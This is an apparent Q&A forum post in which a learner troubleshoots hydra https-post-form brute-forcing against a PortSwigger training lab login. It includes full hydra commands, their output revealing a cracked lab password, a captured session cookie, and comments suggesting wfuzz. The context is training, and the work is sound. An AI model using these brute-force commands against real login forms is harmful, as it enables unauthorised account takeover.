0

I am doing portswigger labs with hydra https-post-form. I try to look for packets that don't have status code 200 OK, because when checked in burp my failed login with bad password and good username had status code 200 OK.

└─$ hydra -l activestat -P ./password -T  9 -vvv -I ac311f351ebe430c80453e6300b10013.web-security-academy.net https-post-form "/login:username=^USER^&password=^PASS^:F=200 OK"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-15 11:10:21
[DATA] max 9 tasks per 1 server, overall 9 tasks, 100 login tries (l:1/p:100), ~12 tries per task
[DATA] attacking http-post-forms://ac311f351ebe430c80453e6300b10013.web-security-academy.net:443/login:username=^USER^&password=^PASS^:F=200             OK
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http://:443/my-account
[STATUS] attack finished for ac311f351ebe430c80453e6300b10013.web-security-academy.net (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-15 11:10:29

As you can see I got 0 valid password found. But when I entered success phrase, one I got from lab solution (status code 302) I got correct password:

└─$ hydra -l activestat -P ./password -T  9 -vvv -I ac311f351ebe430c80453e6300b10013.web-security-academy.net https-post-form "/login:userna            me=^USER^&password=^PASS^:S=302"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purpo            ses (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-15 11:03:08
[DATA] max 9 tasks per 1 server, overall 9 tasks, 100 login tries (l:1/p:100), ~12 tries per task
[DATA] attacking http-post-forms://ac311f351ebe430c80453e6300b10013.web-security-academy.net:443/login:username=^USER^&password=^PASS^:S=302
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[443][http-post-form] host: ac311f351ebe430c80453e6300b10013.web-security-academy.net   login: activestat   password: 2000
[STATUS] attack finished for ac311f351ebe430c80453e6300b10013.web-security-academy.net (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-15 11:03:27

The response after success

HTTP/1.1 302 Found
Location: /my-account
Set-Cookie: session=TAz87Tx9GTaWtckpbOaujoqibP4bNGzn; Secure; HttpOnly; SameSite=None
Content-Encoding: gzip
Connection: close
Content-Length: 0

I also checked other options, that is always returned after failed login:

:F=Invalid username or password

But still no results, do you know where is the problem?

Zorot
  • 1
  • Also can you tell me or give link for information where is the list of characters i have to escape? I found out that / and . need to be escaped, but couldn't find it in manual. – Zorot Aug 15 '21 at 09:24
  • Hi , i suggest you to use wfuzz or his go version to do a bruteforce attack against an http form . – Marco Nappi Aug 15 '21 at 09:48
  • i'll check it soon, thank you. I tried to do these burp, but it's too slow without premium account. – Zorot Aug 15 '21 at 10:01
  • Let me know how goes. To find a correct login in all the request search for the http code 302 – Marco Nappi Aug 15 '21 at 11:15
  • but why searching for something, that doesn't have http code 200 doesn't work? if it's 302 it cannot be 200 :// – Zorot Aug 15 '21 at 13:42
  • 302 stands for "found" aka a successful redirect . You can see that in your answer – Marco Nappi Aug 15 '21 at 15:39
  • So when we deal with login forms it mostly gives 200 OK and redirects with 302 Found. In burp we get 302 code because it's coded in application and give us redirect status code? – Zorot Aug 15 '21 at 22:37
  • I mean why F=200 doesn't work if we get 302 successful redirect. Maybe it checl's whole chain? and there are 2 responds in one stack one with 200, other with 302, and 302 is discarded ? – Zorot Aug 15 '21 at 22:41
  • 200 Means It loads login Page. 302 Means the server redirect the user to account page – Marco Nappi Aug 16 '21 at 11:19

0 Answers0